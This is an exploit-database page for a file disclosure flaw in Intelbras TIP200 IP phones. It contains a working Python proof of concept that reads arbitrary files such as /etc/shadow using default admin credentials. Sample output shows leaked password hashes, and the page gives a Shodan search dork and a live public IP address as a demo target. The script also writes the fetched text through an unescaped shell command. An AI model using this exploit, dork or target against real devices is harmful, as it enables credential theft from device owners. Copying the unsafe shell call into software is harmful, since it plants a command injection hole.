Intelbras Telefone Local File Disclosure

2018.03.22

Informacion - Anonymous (CO)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: Intelbras Telefone IP TIP200 LITE

# Title: Intelbras Telefone Local File Disclosure
# Shodan: Intelbras Telefone IP TIP200 LITE
# Date: 21/03/2018
# Tested: w10
# Credit: Informacion - Anonymous
# Authors: Matheus Goncalves - anhax0r
# Version: [60.0.75.29] (REQUIRED)
# Exploit:

import requests as http
import subprocess
import os
from requests.auth import HTTPBasicAuth
def poc():
    print("""                -------------------------------------------------------------------------------------------------------------
                ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include | Local File Download-------------------
                -------------      P0c Author: Matheus Goncalves | Pentester at Anhax Security Team       -------------------
                -------------------------------------------------------------------------------------------------------------\n""")
    filename = raw_input("filename Ex: /etc/shadow: -> ")
    if(filename == ""):
        filename="/etc/shadow"
    r = http.get("http://192.168.0.207/cgi-bin/cgiServer.exx?page="+str(filename), auth=HTTPBasicAuth('admin', 'admin'))
    print(" ")
    text = r.text
     
    print(text)
    savefile = raw_input("Save file? [Y\\n]: ")
    savefile.upper()
    if(savefile=="Y" or savefile=="y"):
        os.system("echo '"+text+"' > "+filename.replace("/etc/", ""))
        print("File saved !!")
        start()
    else:
        start()
             
def start():
    poc()
     
start()

#root@hax:~/itscanner# python p0c.py 
#                -------------------------------------------------------------------------------------------------------------
#                ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include |-------------------
#                -------------      P0c Author: Matheus Goncalves | Pentester at Anhax Security Team       -------------------
#                -------------------------------------------------------------------------------------------------------------
#filename Ex: /etc/shadow: -> /etc/shadow
  
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::
 
#Save file? [Y\n]: y
#File saved !!
 
#root@hax:~/itscanner# cat shadow 
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::

# Dem0:

- http://177.135.140.143
####################################################

References:

https://cxsecurity.com/issue/WLB-2018030168

https://www.exploit-db.com/exploits/44317/

https://www.facebook.com/Informacion-Anonymous-611394289006994/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Intelbras Telefone Local File Disclosure

Dork: Intelbras Telefone IP TIP200 LITE

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.